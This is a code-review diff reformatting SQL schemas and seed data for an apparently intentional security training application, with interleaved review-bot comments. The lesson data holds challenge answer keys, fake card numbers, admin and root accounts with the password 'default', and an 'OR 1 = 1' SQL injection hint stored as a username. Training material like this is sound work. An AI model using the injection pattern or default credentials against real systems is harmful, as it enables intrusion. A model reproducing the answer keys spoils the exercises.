-- Table `core`.`modules`
-- -----------------------------------------------------
- CREATE TABLE IF NOT EXISTS `backup`.`modules`
- (
- `moduleId` VARCHAR(64) NOT NULL,
- `moduleName` VARCHAR(64) NOT NULL,
- `moduleType` VARCHAR(16) NOT NULL,
- `moduleCategory` VARCHAR(64) NULL,
- `moduleResult` VARCHAR(191) NULL,
- `moduleHash` VARCHAR(191) NULL,
- `incrementalRank` INT NULL,
- `scoreValue` INT NOT NULL DEFAULT 50,
- `scoreBonus` INT NOT NULL DEFAULT 5,
- PRIMARY KEY (`moduleId`)
- )
- ENGINE = InnoDB;
-
-
- -- -----------------------------------------------------
+CREATE TABLE IF NOT EXISTS `backup`.`modules` (
+ `moduleId` VARCHAR(64) NOT NULL ,
+ `moduleName` VARCHAR(64) NOT NULL ,
+ `moduleType` VARCHAR(16) NOT NULL ,
+ `moduleCategory` VARCHAR(64) NULL ,
+ `moduleResult` VARCHAR(191) NULL ,
+ `moduleHash` VARCHAR(191) NULL ,
+ `incrementalRank` INT NULL ,
+ `scoreValue` INT NOT NULL DEFAULT 50 ,
+ `scoreBonus` INT NOT NULL DEFAULT 5 ,
+ PRIMARY KEY (`moduleId`) )
+ENGINE = InnoDB;
+
+
+-- -----------------------------------------------------
-- Table `core`.`results`
-- -----------------------------------------------------
- CREATE TABLE IF NOT EXISTS `backup`.`results`
- (
- `userId` VARCHAR(64) NOT NULL,
- `moduleId` VARCHAR(64) NOT NULL,
- `startTime` DATETIME NOT NULL,
- `finishTime` DATETIME NULL,
- `csrfCount` INT NULL DEFAULT 0,
- `resultSubmission` LONGTEXT NULL,
- `knowledgeBefore` INT NULL,
- `knowledgeAfter` INT NULL,
- `difficulty` INT NULL,
- PRIMARY KEY (`userId`, `moduleId`),
- INDEX `fk_Results_Modules1` (`moduleId` ASC),
- CONSTRAINT `fk_Results_users1`
- FOREIGN KEY (`userId`)
- REFERENCES `backup`.`users` (`userId`)
- ON DELETE NO ACTION
- ON UPDATE NO ACTION,
- CONSTRAINT `fk_Results_Modules1`
- FOREIGN KEY (`moduleId`)
- REFERENCES `backup`.`modules` (`moduleId`)
- ON DELETE CASCADE
- ON UPDATE CASCADE
- )
- ENGINE = InnoDB;
-
-
- -- -----------------------------------------------------
+CREATE TABLE IF NOT EXISTS `backup`.`results` (
+ `userId` VARCHAR(64) NOT NULL ,
+ `moduleId` VARCHAR(64) NOT NULL ,
+ `startTime` DATETIME NOT NULL ,
+ `finishTime` DATETIME NULL ,
+ `csrfCount` INT NULL DEFAULT 0 ,
+ `resultSubmission` LONGTEXT NULL ,
+ `knowledgeBefore` INT NULL ,
+ `knowledgeAfter` INT NULL ,
+ `difficulty` INT NULL ,
+ PRIMARY KEY (`userId`, `moduleId`) ,
+ INDEX `fk_Results_Modules1` (`moduleId` ASC) ,
+ CONSTRAINT `fk_Results_users1`
+ FOREIGN KEY (`userId` )
+ REFERENCES `backup`.`users` (`userId` )
+ ON DELETE NO ACTION
+ ON UPDATE NO ACTION,
+ CONSTRAINT `fk_Results_Modules1`
+ FOREIGN KEY (`moduleId` )
+ REFERENCES `backup`.`modules` (`moduleId` )
+ ON DELETE CASCADE
+ ON UPDATE CASCADE)
+ENGINE = InnoDB;
+
+
+-- -----------------------------------------------------
-- Table `core`.`cheatsheet`
-- -----------------------------------------------------
- CREATE TABLE IF NOT EXISTS `backup`.`cheatsheet`
- (
- `cheatSheetId` VARCHAR(64) NOT NULL,
- `moduleId` VARCHAR(64) NOT NULL,
- `createDate` DATETIME NOT NULL,
- `solution` LONGTEXT NOT NULL,
- PRIMARY KEY (`cheatSheetId`, `moduleId`),
- INDEX `fk_CheatSheet_Modules1` (`moduleId` ASC),
- CONSTRAINT `fk_CheatSheet_Modules1`
- FOREIGN KEY (`moduleId`)
- REFERENCES `backup`.`modules` (`moduleId`)
- ON DELETE CASCADE
- ON UPDATE CASCADE
- )
- ENGINE = InnoDB;
-
-
- -- -----------------------------------------------------
+CREATE TABLE IF NOT EXISTS `backup`.`cheatsheet` (
+ `cheatSheetId` VARCHAR(64) NOT NULL ,
+ `moduleId` VARCHAR(64) NOT NULL ,
+ `createDate` DATETIME NOT NULL ,
+ `solution` LONGTEXT NOT NULL ,
+ PRIMARY KEY (`cheatSheetId`, `moduleId`) ,
+ INDEX `fk_CheatSheet_Modules1` (`moduleId` ASC) ,
+ CONSTRAINT `fk_CheatSheet_Modules1`
+ FOREIGN KEY (`moduleId` )
+ REFERENCES `backup`.`modules` (`moduleId` )
+ ON DELETE CASCADE
+ ON UPDATE CASCADE)
+ENGINE = InnoDB;
+
+
+-- -----------------------------------------------------
-- Table `core`.`sequence`
-- -----------------------------------------------------
- CREATE TABLE IF NOT EXISTS `backup`.`sequence`
- (
- `tableName` VARCHAR(32) NOT NULL,
- `currVal` BIGINT(20) NOT NULL DEFAULT 282475249,
- PRIMARY KEY (`tableName`)
- )
- ENGINE = InnoDB;
+CREATE TABLE IF NOT EXISTS `backup`.`sequence` (
+ `tableName` VARCHAR(32) NOT NULL ,
+ `currVal` BIGINT(20) NOT NULL DEFAULT 282475249 ,
+ PRIMARY KEY (`tableName`) )
+ENGINE = InnoDB;
- Insert into `backup`.`class` (Select * from `core`.`class`);
- Insert into `backup`.`users` (Select * from `core`.`users`);
- Insert into `backup`.`modules` (Select * from `core`.`modules`);
- Insert into `backup`.`results` (Select * from `core`.`results`);
- Insert into `backup`.`cheatsheet` (Select * from `core`.`cheatsheet`);
- Insert into `backup`.`sequence` (Select * from `core`.`sequence`);
- END
+Insert into `backup`.`class` (Select * from `core`.`class`);
+Insert into `backup`.`users` (Select * from `core`.`users`);
+Insert into `backup`.`modules` (Select * from `core`.`modules`);
+Insert into `backup`.`results` (Select * from `core`.`results`);
+Insert into `backup`.`cheatsheet` (Select * from `core`.`cheatsheet`);
+Insert into `backup`.`sequence` (Select * from `core`.`sequence`);
--- $$
+END
+
+ -- $$
-- DELIMITER ;
;
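Review bot: The backup.modules table created in this event body does not match the column list used by the module INSERTs earlier in this file: those name 13 columns (among them moduleNameLangPointer, moduleCategoryLangPointer, moduleStatus, hardcodedKey and isUnsafe), while the backup table declares 9 and adds scoreBonus. If those rows go into core.modules, the positional `Insert into backup.modules (Select * from core.modules)` would fail on column count, and the results, cheatsheet and sequence copies after it would presumably not run, leaving those freshly dropped backup tables empty on every one-minute run. Deriving the copy from the live table, e.g. `CREATE TABLE IF NOT EXISTS backup.modules LIKE core.modules;`, or naming the columns on both sides of each insert, keeps the two schemas in step; backup.users deserves the same comparison against core.users. Because backup.users receives the userPass column, privileges on the backup schema should be no wider than those on core.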
diff --git a/src/main/resources/database/moduleSchemas.sql b/src/main/resources/database/moduleSchemas.sql
index e729761d6..48f187a79 100644
--- a/src/main/resources/database/moduleSchemas.sql
+++ b/src/main/resources/database/moduleSchemas.sql
@@ -24,67 +24,39 @@
-- SQL Lesson
-- ======================================================
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
DROP SCHEMA IF EXISTS `SqlInjLesson`;
-CREATE SCHEMA IF NOT EXISTS `SqlInjLesson` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`SqlInjLesson` ;
+CREATE SCHEMA IF NOT EXISTS `SqlInjLesson` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `SqlInjLesson` ;
-- -----------------------------------------------------
-- Table `SqlInjLesson`.`tb_users`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `SqlInjLesson`.`tb_users`
-(
- `usersId`
- INT
- NOT
- NULL
- AUTO_INCREMENT,
- `username`
- VARCHAR
-(
- 64
-) NOT NULL ,
- `comment` LONGTEXT NULL ,
- PRIMARY KEY
-(
- `usersId`
-) )
- ENGINE = InnoDB;
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE TABLE IF NOT EXISTS `SqlInjLesson`.`tb_users` (
+ `usersId` INT NOT NULL AUTO_INCREMENT ,
+ `username` VARCHAR(64) NOT NULL ,
+ `comment` LONGTEXT NULL ,
+ PRIMARY KEY (`usersId`) )
+ENGINE = InnoDB;
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
-- -----------------------------------------------------
-- Data for table `SqlInjLesson`.`tb_users`
-- -----------------------------------------------------
START TRANSACTION;
-USE
-`SqlInjLesson`;
-INSERT INTO `SqlInjLesson`.`tb_users` (`usersId`, `username`, `comment`)
-VALUES (14232, 'Mark Denihan', 'This guy wrote this application');
-INSERT INTO `SqlInjLesson`.`tb_users` (`usersId`, `username`, `comment`)
-VALUES (61523, 'Cloud', 'Has a Big Sword');
-INSERT INTO `SqlInjLesson`.`tb_users` (`usersId`, `username`, `comment`)
-VALUES (12543, 'Fred Mtenzi', 'A lecturer in DIT Kevin Street');
-INSERT INTO `SqlInjLesson`.`tb_users` (`usersId`, `username`, `comment`)
-VALUES (82642, 'qw!dshs@ab',
- 'Lesson Completed. The result key is 3c17f6bf34080979e0cebda5672e989c07ceec9fa4ee7b7c17c9e3ce26bc63e0');
-INSERT INTO `SqlInjLesson`.`tb_users` (`usersId`, `username`, `comment`)
-VALUES (12345, 'user', 'Try Adding some SQL Code');
-INSERT INTO `SqlInjLesson`.`tb_users` (`usersId`, `username`, `comment`)
-VALUES (12346, 'OR 1 = 1',
- 'Your Close, You need to escape the string with an apostraphe so that your code is interpreted');
+USE `SqlInjLesson`;
+INSERT INTO `SqlInjLesson`.`tb_users` (`usersId`, `username`, `comment`) VALUES (14232, 'Mark Denihan', 'This guy wrote this application');
+INSERT INTO `SqlInjLesson`.`tb_users` (`usersId`, `username`, `comment`) VALUES (61523, 'Cloud', 'Has a Big Sword');
+INSERT INTO `SqlInjLesson`.`tb_users` (`usersId`, `username`, `comment`) VALUES (12543, 'Fred Mtenzi', 'A lecturer in DIT Kevin Street');
+INSERT INTO `SqlInjLesson`.`tb_users` (`usersId`, `username`, `comment`) VALUES (82642, 'qw!dshs@ab', 'Lesson Completed. The result key is 3c17f6bf34080979e0cebda5672e989c07ceec9fa4ee7b7c17c9e3ce26bc63e0');
+INSERT INTO `SqlInjLesson`.`tb_users` (`usersId`, `username`, `comment`) VALUES (12345, 'user', 'Try Adding some SQL Code');
+INSERT INTO `SqlInjLesson`.`tb_users` (`usersId`, `username`, `comment`) VALUES (12346, 'OR 1 = 1', 'Your Close, You need to escape the string with an apostraphe so that your code is interpreted');
COMMIT;
@@ -92,64 +64,38 @@ COMMIT;
-- SQL Challenge Two (email)
-- ======================================================
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
-DROP SCHEMA IF EXISTS `SqlChalEmail`;
-CREATE SCHEMA IF NOT EXISTS `SqlChalEmail` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`SqlChalEmail` ;
+DROP SCHEMA IF EXISTS `SqlChalEmail` ;
+CREATE SCHEMA IF NOT EXISTS `SqlChalEmail` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `SqlChalEmail` ;
-- -----------------------------------------------------
-- Table `SqlChalEmail`.`customers`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `SqlChalEmail`.`customers`
-(
- `customerId` VARCHAR
-(
- 64
-) NOT NULL ,
- `customerName` VARCHAR
-(
- 32
-) NOT NULL ,
- `customerAddress` VARCHAR
-(
- 32
-) NOT NULL ,
- `comment` LONGTEXT NULL ,
- PRIMARY KEY
-(
- `customerId`
-) )
- ENGINE = InnoDB;
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE TABLE IF NOT EXISTS `SqlChalEmail`.`customers` (
+ `customerId` VARCHAR(64) NOT NULL ,
+ `customerName` VARCHAR(32) NOT NULL ,
+ `customerAddress` VARCHAR(32) NOT NULL ,
+ `comment` LONGTEXT NULL ,
+ PRIMARY KEY (`customerId`) )
+ENGINE = InnoDB;
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
-- -----------------------------------------------------
-- Data for table `SqlChalEmail`.`customers`
-- -----------------------------------------------------
START TRANSACTION;
-USE
-`SqlChalEmail`;
-INSERT INTO `SqlChalEmail`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('019ce129ee8960a6b875b20095705d53f8c7b0ca', 'John Fits', 'crazycat@example.com', NULL);
-INSERT INTO `SqlChalEmail`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('44e2bdc1059903f464e5ba9a34b927614d7fee55', 'Rita Hanolan', 'thenightbefore@example.com',
- 'Well Done! The Result key is f62abebf5658a6a44c5c9babc7865110c62f5ecd9d0a7052db48c4dbee0200e3');
-INSERT INTO `SqlChalEmail`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('05159435826869ccfd76d77a2ed4ba7c2023f0cb', 'Rubix Man', 'manycolours@cube.com', NULL);
-INSERT INTO `SqlChalEmail`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('6c5c26a1deccf4a87059deb0a3fb463ff7d62fd5', 'Paul O Brien', 'sixshooter@deaf.com', NULL);
+USE `SqlChalEmail`;
+INSERT INTO `SqlChalEmail`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('019ce129ee8960a6b875b20095705d53f8c7b0ca', 'John Fits', 'crazycat@example.com', NULL);
+INSERT INTO `SqlChalEmail`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('44e2bdc1059903f464e5ba9a34b927614d7fee55', 'Rita Hanolan', 'thenightbefore@example.com', 'Well Done! The Result key is f62abebf5658a6a44c5c9babc7865110c62f5ecd9d0a7052db48c4dbee0200e3');
+INSERT INTO `SqlChalEmail`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('05159435826869ccfd76d77a2ed4ba7c2023f0cb', 'Rubix Man', 'manycolours@cube.com', NULL);
+INSERT INTO `SqlChalEmail`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('6c5c26a1deccf4a87059deb0a3fb463ff7d62fd5', 'Paul O Brien', 'sixshooter@deaf.com', NULL);
COMMIT;
@@ -157,65 +103,39 @@ COMMIT;
-- SQL Challenge 1
-- ======================================================
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
-CREATE SCHEMA IF NOT EXISTS `SqlChalOne` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`SqlChalOne` ;
+CREATE SCHEMA IF NOT EXISTS `SqlChalOne` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `SqlChalOne` ;
-- -----------------------------------------------------
-- Table `SqlChalOne`.`customers`
-- -----------------------------------------------------
-DROP TABLE IF EXISTS `SqlChalOne`.`customers`;
-
-CREATE TABLE IF NOT EXISTS `SqlChalOne`.`customers`
-(
- `customerId` VARCHAR
-(
- 64
-) NOT NULL ,
- `customerName` VARCHAR
-(
- 32
-) NOT NULL ,
- `customerAddress` VARCHAR
-(
- 32
-) NOT NULL ,
- `comment` LONGTEXT NULL ,
- PRIMARY KEY
-(
- `customerId`
-) )
- ENGINE = InnoDB;
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+DROP TABLE IF EXISTS `SqlChalOne`.`customers` ;
+
+CREATE TABLE IF NOT EXISTS `SqlChalOne`.`customers` (
+ `customerId` VARCHAR(64) NOT NULL ,
+ `customerName` VARCHAR(32) NOT NULL ,
+ `customerAddress` VARCHAR(32) NOT NULL ,
+ `comment` LONGTEXT NULL ,
+ PRIMARY KEY (`customerId`) )
+ENGINE = InnoDB;
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
-- -----------------------------------------------------
-- Data for table `SqlChalOne`.`customers`
-- -----------------------------------------------------
START TRANSACTION;
-USE
-`SqlChalOne`;
-INSERT INTO `SqlChalOne`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('019ce129ee8960a6b875b20095705d53f8c7b0ca', 'John Fits', 'crazycat@example.com', NULL);
-INSERT INTO `SqlChalOne`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('44e2bdc1059903f464e5ba9a34b927614d7fee55', 'Rita Hanolan', 'thenightbefore@example.com', NULL);
-INSERT INTO `SqlChalOne`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('05159435826869ccfd76d77a2ed4ba7c2023f0cb', 'Rubix Man', 'manycolours@cube.com', NULL);
-INSERT INTO `SqlChalOne`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('6c5c26a1deccf4a87059deb0a3fb463ff7d62fd5', 'Paul O Brien', 'sixshooter@deaf.com',
- 'Well Done! The reuslt Key is fd8e9a29dab791197115b58061b215594211e72c1680f1eacc50b0394133a09f');
+USE `SqlChalOne`;
+INSERT INTO `SqlChalOne`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('019ce129ee8960a6b875b20095705d53f8c7b0ca', 'John Fits', 'crazycat@example.com', NULL);
+INSERT INTO `SqlChalOne`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('44e2bdc1059903f464e5ba9a34b927614d7fee55', 'Rita Hanolan', 'thenightbefore@example.com', NULL);
+INSERT INTO `SqlChalOne`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('05159435826869ccfd76d77a2ed4ba7c2023f0cb', 'Rubix Man', 'manycolours@cube.com', NULL);
+INSERT INTO `SqlChalOne`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('6c5c26a1deccf4a87059deb0a3fb463ff7d62fd5', 'Paul O Brien', 'sixshooter@deaf.com', 'Well Done! The reuslt Key is fd8e9a29dab791197115b58061b215594211e72c1680f1eacc50b0394133a09f');
COMMIT;
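Review bot: The success message in the last `SqlChalOne`.`customers` insert still reads `'Well Done! The reuslt Key is …'`, while the matching row for `SqlChalEmail` spells it `'The Result key is …'`. Since this commit rewrites the line anyway, the spelling could be corrected to `Result` with the key value left untouched. Before changing it, check whether any test or client code matches on the current text, because this string is returned to the player at runtime.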
@@ -223,271 +143,148 @@ COMMIT;
-- SQL Challenge 3
-- ======================================================
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
-CREATE SCHEMA IF NOT EXISTS `SqlChalThree` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`SqlChalThree` ;
+CREATE SCHEMA IF NOT EXISTS `SqlChalThree` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `SqlChalThree` ;
-- -----------------------------------------------------
-- Table `SqlChalThree`.`customers`
-- -----------------------------------------------------
-DROP TABLE IF EXISTS `SqlChalThree`.`customers`;
-
-CREATE TABLE IF NOT EXISTS `SqlChalThree`.`customers`
-(
- `customerId` VARCHAR
-(
- 64
-) NOT NULL ,
- `customerName` VARCHAR
-(
- 32
-) NOT NULL ,
- `creditCardNumber` VARCHAR
-(
- 19
-) NOT NULL ,
- `creditCardExp` VARCHAR
-(
- 5
-) NOT NULL ,
- `creditCardSecurityNumber` VARCHAR
-(
- 3
-) NOT NULL ,
- PRIMARY KEY
-(
- `customerId`
-) )
- ENGINE = InnoDB;
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+DROP TABLE IF EXISTS `SqlChalThree`.`customers` ;
+
+CREATE TABLE IF NOT EXISTS `SqlChalThree`.`customers` (
+ `customerId` VARCHAR(64) NOT NULL ,
+ `customerName` VARCHAR(32) NOT NULL ,
+ `creditCardNumber` VARCHAR(19) NOT NULL ,
+ `creditCardExp` VARCHAR(5) NOT NULL ,
+ `creditCardSecurityNumber` VARCHAR(3) NOT NULL ,
+ PRIMARY KEY (`customerId`) )
+ENGINE = InnoDB;
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
-- -----------------------------------------------------
-- Data for table `SqlChalThree`.`customers`
-- -----------------------------------------------------
START TRANSACTION;
-USE
-`SqlChalThree`;
-INSERT INTO `SqlChalThree`.`customers` (`customerId`, `customerName`, `creditCardNumber`, `creditCardExp`,
- `creditCardSecurityNumber`)
-VALUES ('ef322ce991de1a890470ad94001e2b83b9266334', 'John Doe', '8454 1244 4712 2144', '12/13', '452');
-INSERT INTO `SqlChalThree`.`customers` (`customerId`, `customerName`, `creditCardNumber`, `creditCardExp`,
- `creditCardSecurityNumber`)
-VALUES ('92cb640f60e2c9ea11cf89ef2c87d442dc3fa345', 'Jason McCoy', '5468 1763 1854 1451', '12/13', '285');
-INSERT INTO `SqlChalThree`.`customers` (`customerId`, `customerName`, `creditCardNumber`, `creditCardExp`,
- `creditCardSecurityNumber`)
-VALUES ('8d6588bbfe4ac5b52ebf452dfc5cefe934b788ae', 'Mark Denihan', '1245 2514 2315 2147', '09/20', '745');
-INSERT INTO `SqlChalThree`.`customers` (`customerId`, `customerName`, `creditCardNumber`, `creditCardExp`,
- `creditCardSecurityNumber`)
-VALUES ('b8811379df47b10b59b717942b8d2aaafeb8f0f8', 'Mary Martin', '9815 1547 3214 7569', '11/14', '987');
-INSERT INTO `SqlChalThree`.`customers` (`customerId`, `customerName`, `creditCardNumber`, `creditCardExp`,
- `creditCardSecurityNumber`)
-VALUES ('cef8433dc9f4e532999fd7767eaaf7ab620fd94d', 'Joseph McDonnell', '9175 1244 4758 8854', '12/13', '653');
+USE `SqlChalThree`;
+INSERT INTO `SqlChalThree`.`customers` (`customerId`, `customerName`, `creditCardNumber`, `creditCardExp`, `creditCardSecurityNumber`) VALUES ('ef322ce991de1a890470ad94001e2b83b9266334', 'John Doe', '8454 1244 4712 2144', '12/13', '452');
+INSERT INTO `SqlChalThree`.`customers` (`customerId`, `customerName`, `creditCardNumber`, `creditCardExp`, `creditCardSecurityNumber`) VALUES ('92cb640f60e2c9ea11cf89ef2c87d442dc3fa345', 'Jason McCoy', '5468 1763 1854 1451', '12/13', '285');
+INSERT INTO `SqlChalThree`.`customers` (`customerId`, `customerName`, `creditCardNumber`, `creditCardExp`, `creditCardSecurityNumber`) VALUES ('8d6588bbfe4ac5b52ebf452dfc5cefe934b788ae', 'Mark Denihan', '1245 2514 2315 2147', '09/20', '745');
+INSERT INTO `SqlChalThree`.`customers` (`customerId`, `customerName`, `creditCardNumber`, `creditCardExp`, `creditCardSecurityNumber`) VALUES ('b8811379df47b10b59b717942b8d2aaafeb8f0f8', 'Mary Martin', '9815 1547 3214 7569', '11/14', '987');
+INSERT INTO `SqlChalThree`.`customers` (`customerId`, `customerName`, `creditCardNumber`, `creditCardExp`, `creditCardSecurityNumber`) VALUES ('cef8433dc9f4e532999fd7767eaaf7ab620fd94d', 'Joseph McDonnell', '9175 1244 4758 8854', '12/13', '653');
COMMIT;
-- ======================================================
-- Broken Authentication and Session Management Challenge 2
-- ======================================================
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
-DROP SCHEMA IF EXISTS `BrokenAuthAndSessMangChalTwo`;
-CREATE SCHEMA IF NOT EXISTS `BrokenAuthAndSessMangChalTwo` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`BrokenAuthAndSessMangChalTwo` ;
+DROP SCHEMA IF EXISTS `BrokenAuthAndSessMangChalTwo` ;
+CREATE SCHEMA IF NOT EXISTS `BrokenAuthAndSessMangChalTwo` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `BrokenAuthAndSessMangChalTwo` ;
-- -----------------------------------------------------
-- Table `BrokenAuthAndSessMangChalTwo`.`users`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `BrokenAuthAndSessMangChalTwo`.`users`
-(
- `userId`
- INT
- NOT
- NULL,
- `userName`
- VARCHAR
-(
- 32
-) NOT NULL ,
- `userPassword` VARCHAR
-(
- 128
-) NOT NULL ,
- `userAddress` VARCHAR
-(
- 128
-) NOT NULL ,
- PRIMARY KEY
-(
- `userId`
-) )
- ENGINE = InnoDB;
-
-
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE TABLE IF NOT EXISTS `BrokenAuthAndSessMangChalTwo`.`users` (
+ `userId` INT NOT NULL ,
+ `userName` VARCHAR(32) NOT NULL ,
+ `userPassword` VARCHAR(128) NOT NULL ,
+ `userAddress` VARCHAR(128) NOT NULL ,
+ PRIMARY KEY (`userId`) )
+ENGINE = InnoDB;
+
+
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
-- -----------------------------------------------------
-- Data for table `BrokenAuthAndSessMangChalTwo`.`users`
-- -----------------------------------------------------
START TRANSACTION;
-USE
-`BrokenAuthAndSessMangChalTwo`;
-INSERT INTO `BrokenAuthAndSessMangChalTwo`.`users` (`userId`, `userName`, `userPassword`, `userAddress`)
-VALUES (12, 'admin', 'default', 'zoidberg22@shepherd.com');
-INSERT INTO `BrokenAuthAndSessMangChalTwo`.`users` (`userId`, `userName`, `userPassword`, `userAddress`)
-VALUES (321, 'administrator', 'default', 'buzzthebald@shepherd.com');
-INSERT INTO `BrokenAuthAndSessMangChalTwo`.`users` (`userId`, `userName`, `userPassword`, `userAddress`)
-VALUES (3212, 'root', 'default', 'elitehacker@shepherd.com');
-INSERT INTO `BrokenAuthAndSessMangChalTwo`.`users` (`userId`, `userName`, `userPassword`, `userAddress`)
